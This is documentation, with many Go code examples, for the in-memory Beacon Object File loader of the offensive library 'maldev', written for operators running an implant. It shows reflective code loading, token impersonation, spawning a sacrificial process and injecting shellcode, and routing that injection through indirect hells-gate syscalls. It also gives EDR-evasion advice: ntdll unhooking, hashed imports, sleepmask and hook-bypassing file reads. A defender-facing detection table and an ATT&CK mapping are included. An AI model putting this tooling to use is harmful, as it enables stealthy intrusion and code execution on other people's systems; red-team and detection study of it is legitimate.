BOF (Beacon Object File) loader

← runtime index · docs/index

TL;DR

You have a .o file (compiled C object) — typically a public BOF from TrustedSec / Outflank / FortyNorth (whoami, situational awareness, file ops). You want to run it inside your implant without spawning a child process. This package loads + executes the COFF in memory.

You want to…UseNotes
Run a BOF from diskRunLoads .o, parses COFF, resolves Beacon API, executes
Run a BOF from memoryRunBytesWhen the BOF was decrypted in-process and never landed on disk
Pass arguments to the BOF (parsed via BeaconData*)Config.ArgsVariadic — the BOF's BeaconDataInt / BeaconDataPtr etc. consume them

What this DOES achieve:

  • Public BOFs (TrustedSec/CS-Situational-Awareness-BOF, TrustedSec/CS-Remote-OPs-BOF, Outflank/C2-Tool-Collection) run unmodified.
  • Beacon API stubs implemented in Go — no Cobalt Strike needed on the operator side.
  • Dynamic imports (KERNEL32, ADVAPI32, …) resolve through PEB + ROR13 hash, so the BOF's import table doesn't appear as plaintext strings.

What this DOES NOT achieve (out of the box):

  • No ARM64. x86 and x64 are both supported (x86 via the cross-process loader under -tags=bof_x86_loader, see below).
  • In-process by default — crash in the BOF kills the implant. The default Execute path runs the BOF on the host's OS thread with no isolation. Opt in to SetSacrificialThread to spawn a dedicated thread with a VEH that turns BOF-mapping faults into a recoverable Go error.
  • AMSI / ETW telemetry from the BOF still fires — pair with evasion/preset.Stealth before Run.

Primer

A BOF is a relocatable COFF (.o) object compiled by MSVC / MinGW. The format is the same as Linux's .o but for Windows PE-style relocations. BOFs were popularised by Cobalt Strike's inline-execute command — a tactical execution primitive that runs a small piece of native code inside the implant's process without spawning a fresh process or writing a PE to disk.

Use cases:

  • Run small Windows-API-heavy snippets (token enum, share enum, share scan) that don't need a full PE infrastructure.
  • Distribute compiled techniques as a .o artefact rather than a full implant.
  • Compose with the implant's runtime — the BOF runs in the caller's address space, so it can interact with implant state directly.

How It Works

flowchart LR
    INPUT[BOF .o bytes] --> PARSE[parse COFF<br>header + sections]
    PARSE --> ALLOC[VirtualAlloc RW<br>copy every section w/ raw data]
    ALLOC --> RELOC[apply relocations<br>ADDR64 / ADDR32NB / REL32]
    RELOC --> IMP[resolve __imp_*<br>PEB walk + ROR13]
    IMP --> FLIP[VirtualProtect<br>exec sections → RX]
    FLIP --> SEH[RtlAddFunctionTable<br>register .pdata]
    SEH --> SYM[resolve entry symbol<br>from COFF symtab]
    SYM --> EXEC[call entry<br>inline OR sacrificial thread]
    EXEC --> OUT[capture output<br>BeaconPrintf / BeaconOutput]

API → godoc

pkg.go.dev/github.com/oioio-space/maldev/runtime/bof is the authoritative reference for every exported symbol. This page teaches the concepts; the godoc is the specification.

Examples

Simple — load + execute

import (
    "os"

    "github.com/oioio-space/maldev/runtime/bof"
)

data, _ := os.ReadFile("whoami.o")
b, err := bof.Load(data)
if err != nil {
    return
}
defer b.Close()
output, _ := b.Execute(nil)
fmt.Println(string(output))

Shorter — one-shot helpers (v0.156.0+)

The same three-line pattern (Load → Execute → Close) wrapped in one call. Five helpers cover the common cases:

// 1. One-shot from bytes (embedded via go:embed, decrypted in
//    memory, ...). Load + Execute + Close in one line.
out, err := bof.RunFromBytes(coffBytes, nil)

// 2. One-shot from disk. The stealthopen.Opener parameter is
//    optional — nil falls back to os.Open. Pass a *Stealth /
//    *MultiStealth to read the file via NTFS Object-ID and
//    bypass path-based EDR file hooks.
out, err := bof.RunFromFile(nil, "whoami.o", nil)

// 3. Crash-isolated one-shot. Identical to RunFromBytes but
//    spawns the entry on a sacrificial OS thread with VEH-
//    mediated fault catching. Required: a non-zero timeout.
out, err := bof.RunSafe(coffBytes, args, 5*time.Second)

// 4. Pack a list of strings without the NewArgs boilerplate.
args := bof.ArgsFromStrings("target.exe", "C:\\Windows\\System32")
out, err := bof.RunFromBytes(coffBytes, args)

Prefer the long form (Load + many Execute + Close) when the same *BOF runs many times — the prepare pass amortises across calls. Use the helpers for genuinely one-shot workloads.

Composed — chain multiple BOFs

for _, path := range []string{"whoami.o", "netstat.o", "tasklist.o"} {
    data, _ := os.ReadFile(path)
    b, err := bof.Load(data)
    if err != nil {
        continue
    }
    out, _ := b.Execute(nil)
    fmt.Printf("=== %s ===\n%s\n", path, out)
}

Advanced — pack arguments via Args

data, _ := os.ReadFile("parse_args.o")
b, _ := bof.Load(data)

a := bof.NewArgs()
a.AddInt(42)
a.AddString("hello-args")

out, _ := b.Execute(a.Pack())
fmt.Println(string(out))

The wire format is little-endian to match the Cobalt Strike canonical: TrustedSec COFFLoader, Outflank etc. read length prefixes via memcpy into a native int, which on x64 is a little-endian load. Use AddInt / AddShort for fixed-width ints, AddString for length-prefixed NUL-terminated strings, AddBytes for raw blobs.

Spec.Sacrificial + Spec.Timeout — crash isolation via Run (v0.156.0+)

The Run(ctx, Spec) façade now honours the same sacrificial-thread contract as (*BOF).SetSacrificialThread:

res, err := bof.Run(ctx, bof.Spec{
    Bytes:       coffBytes,
    Args:        args,
    Sacrificial: true,
    Timeout:     30 * time.Second, // mandatory when Sacrificial is set
})

Sacrificial=true without a Timeout returns ErrSacrificialNoTimeout — the package refuses to launch a thread with no wall-clock cap (zero to WaitForSingleObject means "wait forever" and is almost never what an implant wants).

Architecture routing — x64 in-process, x86 cross-process (v0.155.0+)

bof.Run sniffs the COFF Machine field and dispatches: x64 runs in-process, x86 runs in a spawned SysWOW64\rundll32.exe via the cross-process loader DLL embedded under the bof_x86_loader build tag. Without the tag, x86 input returns the sentinel bof.ErrCrossArchX86Unsupported so callers can branch on architecture without parsing the file themselves.

import (
    "context"
    "errors"
    "os"

    "github.com/oioio-space/maldev/runtime/bof"
)

data, _ := os.ReadFile(bofPath)
res, err := bof.Run(context.Background(), bof.Spec{Bytes: data})
switch {
case err == nil:
    // Auto-routed: x64 ran in-process, x86 ran in a WoW64 helper
    // if the implant was built with `-tags=bof_x86_loader`.
    fmt.Println(string(res.Output))
case errors.Is(err, bof.ErrCrossArchX86Unsupported):
    // 32-bit .o detected and this implant was NOT compiled with
    // `bof_x86_loader`. The build-tag gate keeps the implant
    // small for missions that don't need x86 — rebuild with the
    // tag (or fall back to a separate 32-bit implant) when an
    // x86 BOF actually shows up in the corpus.
    log.Printf("skip %s: rebuild with -tags=bof_x86_loader", bofPath)
default:
    log.Printf("bof.Run failed: %v", err)
}

bof.DetectKind(data) is also exported if a caller wants to classify the bytes without running them — handy for triage tools that enumerate a public corpus before execution. See runtime/bof/internal/x86loader/README.md for the x86 loader architecture (Beacon API symbol surface, parent ↔ helper IPC, threat model).

Token impersonation + spawn-and-inject

The slice-1 surface lets a CS BOF impersonate, spawn a sacrificial target, and inject without any extra glue:

b, _ := bof.Load(coffBytes)
b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payloadShellcode) // optional, surfaced via BeaconGetCustomUserData

out, _ := b.Execute(nil)
// The BOF internally calls:
//   BeaconUseToken(handle)             → ImpersonateLoggedOnUser
//   BeaconSpawnTemporaryProcess(...)   → CreateProcess suspended
//   BeaconInjectTemporaryProcess(...)  → write + CreateRemoteThread + Resume
//   BeaconRevertToken()                → RevertToSelf
fmt.Println(string(out))

Execute pins the goroutine to its OS thread for the entire call, so the impersonation in step 1 is honoured by the syscalls the BOF issues in later steps.

Reuse — prepare once, run many (v0.153.0+)

A single *BOF can be Execute'd any number of times. The expensive load work runs lazily on the first call and is cached on the BOF; subsequent calls skip straight to the entry point.

Cost breakdown per call:

PhaseFirst ExecuteSubsequent Execute
Parse sections
VirtualAlloc + section copy
Resolve imports (PEB walk × N)
Apply relocations
VirtualProtect RW→RX
Reset writable sections (if not persistent)✓ (cheap)
Call entry
import "github.com/oioio-space/maldev/runtime/bof"

bytes, _ := os.ReadFile("whoami.o")
b, _ := bof.Load(bytes)
defer b.Close() // releases the cached RX mapping + .pdata unwind table

// First call: full parse + alloc + reloc + execute.
out1, _ := b.Execute(nil)
fmt.Println(string(out1))

// Second call: reuses the mapping, just re-runs the entry.
out2, _ := b.Execute(nil)
fmt.Println(string(out2))

Close() — release the cached mapping

b, _ := bof.Load(bytes)
out, _ := b.Execute(nil)
if err := b.Close(); err != nil {
    log.Printf("Close: %v", err)
}

// After Close, Execute returns an error rather than crashing.
_, err := b.Execute(nil)
if err != nil {
    // "runtime/bof: Execute on closed BOF"
}

Close is idempotent — multiple calls are safe. It does two things in order: RtlDeleteFunctionTable (unregister the .pdata unwind entries from Bundle E) then VirtualFree (drop the RX mapping). A runtime.SetFinalizer in Load is a safety net for callers who forget Close, but Go finalizer timing isn't guaranteed: long-lived implants should Close explicitly to free the mapping in a timely fashion.

SetPersistent — stateful vs stateless BOFs (v0.153.0+)

SetPersistent arbitrates whether writable sections (.data, .bss, .rdata-with-writes) are restored between Execute calls.

ModeBehaviourSuits
false (default)Each Execute restores writable sections to their initial bytesStateless BOFs — hello_beacon, parse_args, realworld_calls, most CS-SA-BOF corpus
trueWritable sections retain whatever the BOF wrote on the previous ExecuteStateful BOFs that intentionally cache cross-call state in .data — Fortra No-Consolation's LIBS_LOADED cache + handle-info struct

Must be called before the first Execute — see ErrAlreadyPrepared.

Stateless (default) — every call sees fresh memory

b, _ := bof.Load(parseArgsBytes)
defer b.Close()

// .data globals zero'd before each Execute. The BOF observes
// the same initial state on every call regardless of what
// previous calls wrote.
for _, arg := range []string{"alice", "bob", "carol"} {
    a := bof.NewArgs(); a.AddString(arg)
    out, _ := b.Execute(a.Pack())
    fmt.Printf("%s → %s\n", arg, out)
}

Persistent — share state across Execute calls

b, _ := bof.Load(noConsolationBytes)
defer b.Close()

if err := b.SetPersistent(true); err != nil {
    // SetPersistent before Execute always succeeds — error
    // means the caller flipped it AFTER the first Execute,
    // which is a contract violation (ErrAlreadyPrepared).
    log.Fatal(err)
}

// Iteration 1: No-Consolation cold-loads all DLL dependencies,
// stores their handles in LIBS_LOADED (a .data global) via
// BeaconAddValue.
b.Execute(packArgs(pe1))

// Iteration 2: LIBS_LOADED is still warm — the BOF skips the
// LoadLibrary chain entirely.
b.Execute(packArgs(pe2))

SetPersistent after Execute → ErrAlreadyPrepared

b, _ := bof.Load(bytes)
defer b.Close()
b.Execute(nil) // runs prepare() — locks the persistence mode

if err := b.SetPersistent(true); errors.Is(err, bof.ErrAlreadyPrepared) {
    // Expected: flipping the mode after prepare would leave
    // the writable-section snapshots inconsistent. Decide at
    // Load time which mode you want.
}

SetSacrificialThread — crash isolation (v0.154.0+)

By default a BOF runs on the same OS thread as the implant. A wild pointer deref, stack overflow, or busted relocation inside the BOF triggers a Windows SEH exception that propagates through Go's runtime handler and ends in TerminateProcessthe implant dies with the BOF.

SetSacrificialThread(timeout) enables crash isolation: the BOF runs on a dedicated thread, a process-wide Vectored Exception Handler intercepts faults whose address lies inside the BOF mapping, redirects the faulting thread to an ExitThread(1) stub, and the host Execute call returns a clean Go error. The implant keeps running.

ModeWhen BOF AVsHost process
Inline (default)SEH → Go runtime → TerminateProcessdies with the BOF
Sacrificial (SetSacrificialThread > 0)VEH catches in-mapping fault → ExitThread → host gets errorsurvives

Honest limitations

  1. Token impersonation does not cross threads by default — use SetExecuteAsToken to pin one. BeaconUseToken inside the BOF impersonates on the BOF's sacrificial thread; the host goroutine keeps its original token. To start the sacrificial thread under a specific identity, call (*BOF).SetExecuteAsToken(token) before Execute — the loader applies it via SetThreadToken between CreateThread(SUSPENDED) and ResumeThread. BOFs that rely on chained token state across calls still need to manage the chain themselves.
  2. Only faults inside the BOF mapping are caught. A BOF that passes a NULL pointer to kernel32!HeapAlloc takes the fault inside kernel32 — outside the BOF range — and still terminates the implant. The VEH range check is on ExceptionAddress, not on the calling BOF.
  3. TerminateThread (used on timeout) leaks the thread's stack + any kernel objects it held. Windows-design limitation. Set timeouts generously; this is a last-resort kill, not a routine cancellation primitive.

Inline (default) — same thread, fastest

b, _ := bof.Load(coffBytes)
defer b.Close()

// SetSacrificialThread NOT called → inline path.
// If this BOF AVs, the implant dies.
out, _ := b.Execute(args)

Sacrificial — implant survives BOF crashes

b, _ := bof.Load(coffBytes)
defer b.Close()

// 5-second wall-clock cap. Zero would disable.
if err := b.SetSacrificialThread(5 * time.Second); err != nil {
    log.Fatal(err) // ErrAlreadyPrepared if called after Execute
}

out, err := b.Execute(args)
switch {
case err == nil:
    // Happy path — BOF returned normally.
    fmt.Println(string(out))
case strings.Contains(err.Error(), "BOF crashed with exception"):
    // BOF AVed / stack-overflowed / executed an illegal
    // instruction inside its own mapping. Implant is still
    // alive; err carries the exception code + faulting PC.
    log.Printf("BOF crash isolated: %v", err)
case strings.Contains(err.Error(), "BOF timeout"):
    // BOF ran longer than the timeout; the sacrificial
    // thread was terminated. Output captured up to the
    // timeout is in `out`.
    log.Printf("BOF timeout, partial output: %s", out)
default:
    // Other Execute error — usually a Load/prepare problem
    // surfaced lazily on the first call.
    log.Fatal(err)
}

Mixing knobs

Every knob below is independent — pick what fits your threat model and combine freely:

b, _ := bof.Load(realworldCallsBytes)
defer b.Close()

b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payload)                   // surfaced via BeaconGetCustomUserData
b.SetPersistent(false)                   // default — fresh .data per call
b.SetSacrificialThread(30 * time.Second) // implant survives BOF crashes
b.SetCaller(myIndirectCaller)            // route BeaconInjectProcess via Nt*
b.SetExecuteAsToken(impersonationToken)  // run the sacrificial thread under that token

for _, target := range targets {
    out, err := b.Execute(packArgs(target))
    if err != nil {
        // Whatever the BOF does inside, this `err` is
        // recoverable: bad BOF code, bad target, timeout.
        // The implant doesn't die.
        log.Printf("%s: %v", target, err)
        continue
    }
    process(out)
}

SetCaller — route cross-process Beacon API via *wsyscall.Caller (v0.156.0+)

BeaconInjectProcess (and the spawn/inject combos that build on it) drives three cross-process kernel32 calls: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread. By default these go through the kernel32 wrappers; under userland-hooking EDR they appear in the API trail. SetCaller redirects all three through a *wsyscall.Caller so they route via NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx — direct, indirect, hells-gate, or any combination the operator builds.

import (
    "github.com/oioio-space/maldev/runtime/bof"
    wsyscall "github.com/oioio-space/maldev/win/syscall"
)

// Indirect syscalls with a hells-gate-style SSN resolver.
caller := wsyscall.New(wsyscall.MethodIndirect, wsyscall.NewHellsGate())
defer caller.Close()

b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetCaller(caller)
_, _ = b.Execute(args)

nil — the default — keeps the kernel32 path. The Caller's lifetime is operator-owned: BOF.Close does NOT call caller.Close, so the same Caller can be shared across many BOFs and inject sites. Matches the convention used across inject.

Scope: only the BeaconInjectProcess primitives route through the Caller. Dynamic imports the BOF itself resolves — __imp_KERNEL32$VirtualAlloc, __imp_ADVAPI32$OpenProcessToken, __imp_NTDLL$Nt*, etc. — are patched into the BOF's import table at prepare time as direct function addresses (PEB walk + ROR13 export match). When the BOF later issues mov reg, [rip+slot]; call reg, it jumps straight to the resolved function and bypasses the operator's Caller entirely.

For full coverage of BOF Win32 calls, clean ntdll instead: the public-corpus audit (CS-SA, 37 BOFs, 652 imports) shows 55% are kernel32/advapi32/etc. wrappers and only 0.4% are Nt* direct — so a per-import shim would only intercept the 0.4%. The pragmatic answer is evasion/unhook: once ntdll's Nt* thunks are restored to their on-disk bytes, kernel32!VirtualAllocntdll!NtAllocateVirtualMemory internally goes through a clean syscall stub, no hook fires. Pair SetCaller with evasion/unhook for end-to-end bypass.

See .dev/refactor-2026/bundle-i-import-routing.md for the closed design discussion + corpus data.

SetExecuteAsToken — pin a token on the sacrificial thread (v0.156.0+)

Closes the historical limitation where BeaconUseToken inside the BOF impersonated only on the sacrificial thread but Execute started that thread under the host's primary token. With SetExecuteAsToken, the loader applies SetThreadToken between CreateThread(SUSPENDED) and ResumeThread — the BOF entry runs under the supplied identity from instruction zero.

Requires SeImpersonatePrivilege (admin / service contexts by default) or a token the caller is permitted to assign.

import (
    "github.com/oioio-space/maldev/runtime/bof"
    "golang.org/x/sys/windows"
)

// Duplicate the current process's primary token to an
// impersonation-grade copy with TOKEN_IMPERSONATE rights.
var primary windows.Token
_ = windows.OpenProcessToken(windows.CurrentProcess(),
    windows.TOKEN_DUPLICATE|windows.TOKEN_QUERY, &primary)
defer windows.CloseHandle(windows.Handle(primary))

var dup windows.Token
_ = windows.DuplicateTokenEx(primary,
    windows.TOKEN_IMPERSONATE|windows.TOKEN_QUERY,
    nil,
    windows.SecurityImpersonation, windows.TokenImpersonation,
    &dup)
defer windows.CloseHandle(windows.Handle(dup))

b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetSacrificialThread(5 * time.Second) // required — token only applies on the sacrificial path
b.SetExecuteAsToken(dup)
_, _ = b.Execute(args)

Zero — the default — keeps the host's primary token. Has no effect on inline Execute (the host's own token always applies on that path).

OPSEC & Detection

ArtefactWhere defenders look
VirtualAlloc(RW)VirtualProtect(RX) cycle on a single mapping (the loader pattern)Behavioural EDR — generic reflective-loader signal even after the RWX→RX-flip mitigation. The two-syscall cadence is itself a tell
MEM_TOP_DOWN allocation with IMAGE_SCN_MEM_EXECUTE content not backed by a loaded moduleETW Microsoft-Windows-Threat-Intelligence (TI events)
BOF entry-point execution from non-image memoryDefender for Endpoint MsSense
RtlAddFunctionTable for a non-image RUNTIME_FUNCTION array (Bundle E)Niche; few products inspect, but kernel ETW captures the kernel-side registration
syscall.NewCallback thunk pages (≈ 28 × 4 KB at first Load)Small VAD entries with characteristic prologue bytes — same signature any Go program with native callbacks emits

D3FEND counters:

  • D3-PA — execute-from-allocation telemetry (RX-after-flip still trips the more thorough EDRs).
  • D3-FCA — YARA on the loaded bytes.

Hardening for the operator (already in the loader by default):

  • RW → RX flip via VirtualProtect after relocations land (loader behaviour since v0.151 — no RWX is ever exposed).
  • MEM_TOP_DOWN placement (high-address bias reduces collision with the host's heap + the most naive low-RVA scanner rules).
  • Encrypt the BOF at rest via crypto; decrypt + load + immediately re-encrypt the source buffer.
  • Pair with evasion/sleepmask for cleartext-at-rest mitigation.
  • Bypass kernel32 userland hooks on the cross-process Beacon API via (*BOF).SetCaller.

MITRE ATT&CK

T-IDNameSub-coverageD3FEND counter
T1059Command and Scripting Interpreterpartial — in-memory native code executionD3-PA
T1620Reflective Code Loadingfull — COFF reflective loadD3-FCA, D3-PA

Limitations

  • Execute is amortised, not free (v0.153+). The first call on a *BOF runs the full loader pass (parse + VirtualAlloc + relocations + RW→RX flip + .pdata registration). Subsequent calls reuse the mapping — ideal for callers like runtime/pe that load one .o and run it many times. Caller responsibility: call Close() explicitly when done. The runtime.SetFinalizer safety net in Load will eventually RtlDeleteFunctionTable + VirtualFree, but Go finalizer timing isn't guaranteed; long-lived implants leaking RX mappings is a real liability.

  • Default Execute is stateless. Writable sections (.data, .bss, .rdata-with-writes) are restored to their initial bytes between Execute calls. BOFs that intentionally cache state in their .data (No-Consolation's LIBS_LOADED cache) need SetPersistent(true) before the first Execute.

  • Beacon-API surface — full 28-symbol set (slice 1, v0.151+). All beacon.h groups are wired:

    • Data parsing: BeaconDataParse / DataInt / DataShort / DataLength / DataExtract.
    • Output / format: BeaconPrintf + BeaconFormatPrintf (format string forwarded verbatim — varargs caveat below), BeaconOutput, BeaconFormatAlloc / Reset / Free / Append / Int / ToString, BeaconErrorD / ErrorDD / ErrorNA.
    • Tokens: BeaconUseToken (ImpersonateLoggedOnUser) / BeaconRevertToken (RevertToSelf). Execute pins the goroutine to its OS thread for the BOF call so the impersonation is honoured by subsequent Win32 calls; we RevertToSelf on Execute exit as a safety net.
    • Injection: BeaconInjectProcess (VirtualAllocEx + WriteProcessMemory + CreateRemoteThread on a host handle), BeaconSpawnTemporaryProcess (CreateProcess suspended on the configured SpawnTo — rundll32.exe by default), BeaconInjectTemporaryProcess (spawn + inject + resume, teardown on failure), BeaconCleanupProcess (terminate + close).
    • Helpers: BeaconIsAdmin, BeaconGetCustomUserData (blob configured via (*BOF).SetUserData), toWideChar (UTF-8 → UTF-16LE, NUL-terminated).
    • Key-value store: BeaconAddValue / BeaconGetValue / BeaconRemoveValue. Scope is the single Execute call — cross-Run state must go through the implant. Any unknown __imp_Beacon* import still fails at relocation time with unresolved external symbol __imp_BeaconXxx — loud and traceable rather than silent NULL-patching.
  • BeaconFormatAlloc buffers live one Execute call. Slices produced by BeaconFormatAlloc are held on the *BOF (per-instance map, not a process-global). BeaconFormatFree drops the entry; whatever the BOF forgets to free is reclaimed automatically when the next Execute starts and on Close(). A BOF that crashes mid-call no longer leaks its format buffer for the process lifetime.

  • SEH unwind via RtlAddFunctionTable. Every COFF with a non-empty .pdata section gets its RUNTIME_FUNCTION entries registered with the kernel during prepare so the OS unwinder can resolve frames inside the BOF mapping. Without this, a BOF that raises a structured exception (C++ throw, compiler- emitted bounds check, RaiseException) would abort during the unwind walk — the kernel could not find a function entry for the BOF's PC. Registration is silent on failure (malformed .pdata → the BOF still runs, just without SEH support). Close calls RtlDeleteFunctionTable before VirtualFree to avoid leaving dangling unwind context.

  • Cross-process Beacon API routes via optional *wsyscall.Caller. BeaconInjectProcess and the spawn/inject combos use VirtualAllocEx + WriteProcessMemory + CreateRemoteThread by default. Operators that need to bypass userland hooks on these kernel32 surfaces call (*BOF).SetCaller with any *wsyscall.Caller (direct / indirect / indirect-asm / hells-gate). The helpers (beaconRemoteAlloc, beaconRemoteWrite, beaconRemoteCreateThread) then route through NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx. nil Caller keeps the kernel32 path — matches the convention used across inject.

  • Pointer-safety probes on %s / Beacon string reads. BeaconPrintf("%s", p) (and any callback that dereferences a BOF-supplied char* / wchar_t*) routes through win/api.CStringFromPtr and win/api.WStringFromPtr. Both call VirtualQuery once to clamp the walk to the committed region containing the pointer, so a malformed, freed, or guard-page-crossing pointer returns "" instead of faulting the host. The wide-string heuristic in expandCFormat shares the same probe via SafeRegionBytes.

  • BeaconPrintf / BeaconFormatPrintf varargs are not expanded. syscall.NewCallback binds a fixed-arity Go function as a stdcall callback; Go cannot introspect cdecl varargs from inside the callback. We chose option (a) in the design discussion: forward the format string verbatim. BOFs that pass a literal format with no % directives behave correctly; BOFs relying on printf-style expansion see the format string raw.

    Two alternatives were considered and rejected for the default build:

    • (b) Leave __imp_BeaconPrintf / BeaconFormatPrintf unresolved so BOFs that depend on varargs fail at load time with a loud error. Honest but breaks compatibility with the large TrustedSec / Outflank corpus where BeaconPrintf(CALLBACK_OUTPUT, "...") is used as a no-args writer in 80% of cases.

    • (c) Implement varargs via cgo. A C wrapper around vsnprintf would expand the format and call back into Go with the rendered string. Requires:

      1. A C cross-compile toolchain in the build environment (mingw-w64 on Linux dev hosts, MSVC on Windows CI).
      2. CGO_ENABLED=1 — flips the entire library out of pure-Go mode, which the README sells as a hard guarantee.
      3. A different binary surface in runtime/bof for cgo vs. pure-Go builds, plus a build-tag matrix.

      The cost is steep relative to the gain (a minority of BOFs). Operators who need full vararg expansion can fork the package, drop a bof_cgo_windows.go file behind //go:build windows && cgo && bof_cgo, and supply a C-side vsnprintf wrapper they register via a hook hung off resolveBeaconImport. That extension point is intentionally left open; the default build prioritises pure-Go and accepts the verbatim-format trade-off.

  • External Win32 imports — two forms supported. CS-canonical dollar-form (__imp_KERNEL32$LoadLibraryA) resolves via parseDollarImportapi.ResolveByHash (PEB walk + ROR13 module/function hash, no GetProcAddress / LoadLibrary call appears in the API trail). Mingw-w64 bare form (__imp_LoadLibraryA with no DLL prefix) resolves by walking a curated module list — kernel32, advapi32, user32, ws2_32, ole32, shell32 — first hit wins. Symbols not in the curated set still fail loudly. Add a module to bareImportSearchOrder in beacon_api_windows.go if a particular BOF needs more coverage.

  • Concurrency: BOF execution is serialised package-wide. The Beacon API stubs read a single currentBOF pointer guarded by bofMu. Concurrent Execute calls — including across different *BOF instances — block on each other. This matches the CS-compatible loader convention (BOF execution is fundamentally single-threaded) and keeps the Beacon callback state coherent without per-call dispatch. Implications:

    • Setters (SetUserData, SetSpawnTo, SetSpawnToX86, SetCaller, SetExecuteAsToken, SetPersistent, SetSacrificialThread) are NOT lock-protected. They are safe to call before the first Execute or between Execute calls; calling them from a host goroutine while a sacrificial-thread Execute is in flight is a race the package does not currently guard against. Until a per-BOF mutex lands, callers that need to mutate state mid-flight should drive each BOF from a single goroutine.
    • Errors() after Close() returns the FINAL Execute's buffer, not nil. The byte buffer is not zeroed at teardown — post-mortem inspection works.
    • syscall.NewCallback cost at first Load. Resolving the Beacon import map allocates one RX page per callback (~28 symbols on the default build → ≈112 KB of RX pages), via Go's runtime. Pages live for the process lifetime and show up as small VAD entries with the syscall thunk pattern. Identical to every Go program that uses syscall.NewCallback.
  • x86 BOFs supported via cross-process reflective load (-tags=bof_x86_loader, v0.155.0+). An x86 .o (Machine == 0x014c) is detected as KindCOFFx86 by DetectKind and routed through the coffX86Loader. With the bof_x86_loader build tag active, the orchestrator manually reflective-loads a small i386 DLL (runtime/bof/internal/x86loader/bof_x86_loader.x86.dll, ~11 KB) into a freshly-spawned SysWOW64\rundll32.exe via VirtualAllocEx + WriteProcessMemory + .reloc application + CreateRemoteThread. The loader DLL parses the BOF .o inside the WoW64 helper, implements 25 Beacon API symbols (full beacon.h Groups 1–6 + BeaconGetOutputData + the four Inject/Spawn process-control entries), and writes captured output into a parent-allocated RW region the parent ReadProcessMemory's back. Zero disk artefacts, zero LoadLibrary call on the loader. Default builds (no tag) surface bof.ErrCrossArchX86Unsupported — operators errors.Is against it. See runtime/bof/internal/x86loader/README.md for the architecture diagram, ABI, and threat-model notes.

  • Relocation coverage. IMAGE_REL_AMD64_ABSOLUTE (no-op), _ADDR64, _ADDR32 (errors out cleanly when target exceeds 32-bit range), _ADDR32NB, _REL32, and the _REL32_1 through _REL32_5 bias variants. Exotic relocations (TLS, GOT, _SECTION, _SECREL) are not supported — the loader fails with unsupported relocation type: 0xNN so the failure mode is obvious instead of a silent corruption.

  • No RWX is exposed. The loader allocates PAGE_READWRITE then flips exec sections to PAGE_EXECUTE_READ after relocations land. Hardened EDRs still flag the VirtualAllocVirtualProtect(EXECUTE) cadence on a fresh mapping — pair with evasion/sleepmask to hide the mapping at rest.

See also